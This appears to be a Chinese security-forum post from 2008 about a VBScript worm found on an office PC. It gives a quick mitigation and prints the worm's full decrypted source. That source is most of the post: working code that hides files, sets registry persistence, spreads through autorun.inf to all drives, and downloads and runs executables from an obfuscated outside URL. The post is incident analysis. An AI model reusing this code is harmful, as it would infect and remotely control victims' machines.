您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 电脑技术 查看内容

一个脚本病毒的简单分析

2008-11-29 10:35| 投稿: computer

摘要:   最近同个办公室的人反映自己莫名奇妙地中病毒,我没放在心上,没想到自己人中了一个,所以就有了今天的这个帖子。  话说,某天晚上我们一伙人正在赶工。。。突然,某人大呼:“我的CPU占用率怎么居高不下?...
  最近同个办公室的人反映自己莫名奇妙地中病毒,我没放在心上,没想到自己人中了一个,所以就有了今天的这个帖子。  话说,某天晚上我们一伙人正在赶工。。。突然,某人大呼:“我的CPU占用率怎么居高不下?”抄起processxp,发现wscript.exe一直在找一个main.vbe,没事怎么会乱运行脚本呢?肯定中毒了!而且可能是传说中的办公室病毒。。。真不巧,遇到我们了。。。呵呵,开始解剖吧!对于这种脚本病毒,我们的解决方法是禁用vbscript.dll,运行“regsrv -u vbscript.dll”,然后CPU就安静下来了。。。那么打开我们的main.vbe吧!在C盘根目录下,首先去掉这个脚本病毒的隐藏和系统属性,然后用记事本打开看看!全是乱码!哎~又是老一套,加密给受害者看,看到头大了,自然没有消灭的想法,但是要运行的话肯定也要解密!果然,在密密麻麻的乱码后面,出现一句excute(thistext),这个thistext不就是病毒明文吗?好,那就把它写出来!把excute(thistext)换成  Dim fso, MyFile  Set fso = CreateObject("Scripting.FileSystemObject")  Set MyFile = fso.CreateTextFile("c:\testfile.txt", True)  MyFile.WriteLine(thistext)  MyFile.Close  在注册一下vbscript.dll  运行!一下子就把病毒揪出来了!  代码:  ver="3.0"  tile="daxian"&ver  about="daxianbiyele 2007.7.11"  fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(104)&chr(103)&"z."&chr(100)&"in"&chr(103)&chr(104)&"ui123."&chr(99)&"n/wan."&chr(97)&"s"&chr(112)  on error resume next  dim wsh  dim WshShell  Set Wsh =CreateObject("WScript.Shell")  set WshShell=Wscript.CreateObject("Wscript.Shell")  Set FSO = CreateObject("Scripting.FileSystemObject")  set dir = FSO.GetSpecialFolder(1)  Set dc = FSO.Drives  ouwnname=Wscript.ScriptName  mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))  if mulu=dir&"\" then sys=true  For Each d In dc  if mulu=d&"\" then opendisk=WshShell.Run("explorer "&d,3,false)  Next  if not sys=true then  wscript.sleep 2000  set y=getobject("winmgmts:\\.\root\cimv2")  set x=y.execquery("select * from win32_process where name='wscript.exe'")  i=0  for each j in x  i=i+1  next  if i>1 then wscript.quit  end if  yincang  If fso.FileExists(mulu&"autorun.inf") Then  if readtxt(mulu&"autorun.inf",1)<>tile then  buildinf ver,"7+11.exe",now  end If  else  buildinf ver,"7+11.exe",now  End If  copyexe=readtxt(mulu&"autorun.inf",7)  randomize  sjs=int(Rnd * (31-1+1)) + 1  If fso.FileExists(mulu&copyexe) and Day(Date)<>sjs then  if sys=true then WshShell.run mulu&copyexe  Else  Ldownver=readtxt(mulu&"autorun.inf",5)  downfile mulu&"temp.txt",fromurl,0  Set OpenFile = FSO.OpenTextFile(mulu&"temp.txt", 1)  nouse = OpenFile.ReadLine  downis = OpenFile.ReadLine  downver = OpenFile.ReadLine  downname = month(Date)&"+"&Day(Date)&".exe"  downfrom = OpenFile.ReadLine  vbsver = OpenFile.ReadLine  vbsname = OpenFile.ReadLine  vbsurl = OpenFile.ReadLine  guanggao= OpenFile.ReadLine  OpenFile.Close  FSO.DeleteFile(mulu&"temp.txt")  if downis=1 then  If vbsver<>ver then  downfile mulu&vbsname,vbsurl,1  wscript.quit  end if  If downver<>Ldownver then  downfile mulu&downname,downfrom,0  buildinf downver,downname,guanggao  end if  end if  End If  copyexe=readtxt(mulu&"autorun.inf",7)  if sys=true then  ganran()  WshShell.run mulu&ouwnname  else  shuxing mulu&ouwnname,2+4  copyvbs dir&"\main.vbe"  copyvbs dir&"\main.txt"  CopyFile mulu&"autorun.inf",dir&"\autorun.inf"  CopyFile mulu&copyexe,dir&"\"&copyexe  shuxing dir&"\"&copyexe,2+4  if mulu<>"C:\" then  copyvbs "c:\main.vbs"  CopyFile mulu&"autorun.inf","c:\autorun.inf"  CopyFile mulu&copyexe,"c:\"&copyexe  end if  zhuce  WshShell.run dir&"\main.vbe"  end if  function copyfile(file,where)  shuxing where,0  if fso.FileExists(file) then FSO.CopyFile file,where,True  end function  function copyvbs(where)  shuxing where,0  set self=fso.opentextfile(mulu&ouwnname,1)  vbscopy=self.readall  self.close  set vbs = fso.CreateTextFile(where, True)  vbs.write vbscopy  vbs.close  shuxing where,2+4  end function  function zhuce()  RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\"  Type_Name="REG_SZ"  Key_Name="explorer"  Key_Data="main.vbe"  WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name  end function  function yincang()  RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"  Type_Name="REG_DWORD"  Key_Name="ShowSuperHidden"  Key_Data="00000000"  WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name  end function  function buildinf(exever,exename,adv)  shuxing mulu&"autorun.inf",0  set ini = fso.CreateTextFile(mulu&"autorun.inf", True)  ini.writeline tile  ini.writeline "[AutoRun]"  ini.writeline about  ini.writeline "open=WScript.exe .\main.vbs"  ini.writeline exever  ini.writeline "shell\open=打开(&O)"  ini.writeline exename  ini.writeline "shell\open\Command=WScript.exe .\main.vbs"  ini.writeline "shell\open\Default=1"  ini.writeline adv  ini.close  shuxing mulu&"autorun.inf",1+2+4  end function  function readtxt(where,line)  Set readfile = fso.OpenTextFile(where, 1)  i=0  do while i<line  i=i+1  RLine = readfile.ReadLine  loop  readfile.Close  readtxt=RLine  end function  function shuxing(file,change)  if fso.FileExists(file) then  Set oFile = FSO.GetFile(file)  oFile.Attributes = change  Set oFile = Nothing  end if  end function  function downfile(localfile,urlfile,runfile)  shuxing localfile,0  iLocal = LCase(localfile):iRemote = LCase(urlfile):  'if 1=2 then Wscript.echo "Impossible!"  Set xPost = CreateObject("Microsoft.XMLHTTP")  'if 1=2 then Wscript.echo "Impossible!"  xPost.Open "get",iRemote,0  'if 1=2 then Wscript.echo "Impossible!"  xPost.Send()  'if 1=2 then Wscript.echo "Impossible!"  Set sGet = CreateObject("ADODB.Stream")  'if 1=2 then Wscript.echo "Impossible!"  sGet.Mode = 3  'if 1=2 then Wscript.echo "Impossible!"  sGet.Type = 1  'if 1=2 then Wscript.echo "Impossible!"  sGet.Open()  'if 1=2 then Wscript.echo "Impossible!"  sGet.Write(xPost.responseBody)  'if 1=2 then Wscript.echo "Impossible!"  sGet.SaveToFile iLocal,2  'if 1=2 then Wscript.echo "Impossible!"  shuxing localfile,2+4  if runfile=1 then Wsh.run iLocal  end function  function ganran()  do  For Each d In dc  If d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then  If fso.FileExists(d&"\main.vbs") and fso.FileExists(d&"\autorun.inf") then  if readtxt(d&"\autorun.inf",1)<>tile then  CopyFile dir&"\autorun.inf",d&"\autorun.inf"  CopyFile dir&"\"&copyexe,d&"\"&copyexe  CopyFile dir&"\main.txt",d&"\main.vbs"  end if  else  CopyFile dir&"\autorun.inf",d&"\autorun.inf"  CopyFile dir&"\"&copyexe,d&"\"&copyexe  CopyFile dir&"\main.txt",d&"\main.vbs"  end if  End If  next  wscript.sleep 2000  loop  end function  呵呵,临时解决方法在上面了,我也没时间去解读这个病毒了~~~还请高手们给出完美解决方案!继续赶工ing。。。。。。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部